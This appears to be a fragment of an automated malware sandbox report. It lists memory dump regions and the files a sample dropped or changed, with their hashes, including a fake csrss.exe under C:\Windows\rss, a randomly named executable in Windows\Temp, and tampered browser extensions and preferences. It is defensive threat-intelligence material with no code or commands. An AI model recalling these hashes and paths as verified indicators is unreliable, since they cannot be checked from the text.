SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/3904-1091-0x00000000009A0000-0x0000000000AA0000-memory.dmp

memory/5904-1099-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1060-1102-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3676-1104-0x00000000732E0000-0x00000000739CE000-memory.dmp

memory/4552-1103-0x00000000003C0000-0x00000000003C8000-memory.dmp

memory/3904-1094-0x0000000000910000-0x0000000000919000-memory.dmp

memory/4552-1107-0x00007FFCF0200000-0x00007FFCF0BEC000-memory.dmp

memory/4552-1108-0x000000001AF70000-0x000000001AF80000-memory.dmp

memory/5472-1109-0x0000000002910000-0x0000000002D13000-memory.dmp

memory/5472-1123-0x0000000002E20000-0x000000000370B000-memory.dmp

memory/2392-1124-0x0000000000510000-0x0000000000511000-memory.dmp

memory/5472-1125-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5900-1127-0x0000000000400000-0x000000000047E000-memory.dmp

memory/924-1144-0x00000000013D0000-0x0000000001ABF000-memory.dmp

memory/5536-1151-0x0000000000400000-0x0000000000627000-memory.dmp

memory/5536-1156-0x0000000000400000-0x0000000000627000-memory.dmp

memory/5900-1155-0x00000000732E0000-0x00000000739CE000-memory.dmp

memory/6132-1158-0x0000000000400000-0x0000000000627000-memory.dmp

memory/6132-1160-0x0000000000400000-0x0000000000627000-memory.dmp

memory/5904-1163-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1060-1171-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4552-1176-0x00007FFCF0200000-0x00007FFCF0BEC000-memory.dmp

memory/4552-1179-0x000000001AF70000-0x000000001AF80000-memory.dmp

memory/1112-1187-0x0000000004850000-0x0000000004886000-memory.dmp

memory/5472-1186-0x0000000002910000-0x0000000002D13000-memory.dmp

memory/5472-1188-0x0000000002E20000-0x000000000370B000-memory.dmp

memory/1112-1189-0x00000000073F0000-0x0000000007A18000-memory.dmp

memory/1112-1190-0x00000000732E0000-0x00000000739CE000-memory.dmp

memory/1112-1192-0x0000000004840000-0x0000000004850000-memory.dmp

memory/1112-1191-0x0000000004840000-0x0000000004850000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\V4M6VAOE\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3kjzebq.amk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Roaming\iirwube

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Windows\rss\csrss.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 00af039c782049b739f384c1123ddd37
SHA1 1c25763e54cdfc9d0a1f679d43fec22b2f2dd348
SHA256 a6144a35bf64451adaedf009a0188771c30204240de4637a8f29136701cf040a
SHA512 e1a8b942b3a09689f4ef315ec83fa62b777ccad242805c36dcc7023674420804aa3741eba581ec7f9365313a34972df6352c852952d7771705bfd19e64078f0a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5699p0ky.default-release\prefs.js

MD5 d8ca1c5d6532b0e4e9fca77dcad1cf54
SHA1 0dff6759fad3a9f7d86098678122752946c6cc52
SHA256 5886f73c0576a8095eeda79ca377d2da1c16b7db58e40e223c9a13d995d5f249
SHA512 8d12973034267ad75756af4c29d5dd4b1238fba29311d2fa21fee44a9f37efb99e2d6807daa11915ced91536acd52b29015c359344aaf0963815961653242ec9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 84bf890a7d478a64e60fa12d1a315958
SHA1 4450520f7ac40ff43de0f202cddda68cdb0aa87b
SHA256 77f44c1260b7a5ba372e62c4972e23caf2bf84e02f6eb02fee52950b9b503aa4
SHA512 a0f3e2408b54baa60dbc8074c114d4fc27d5733104c079d6f3582e3d6eced12d62ed207b56ea3c3096412abdfb5516c27cac9bb4940e47fb004f484b9c51ab06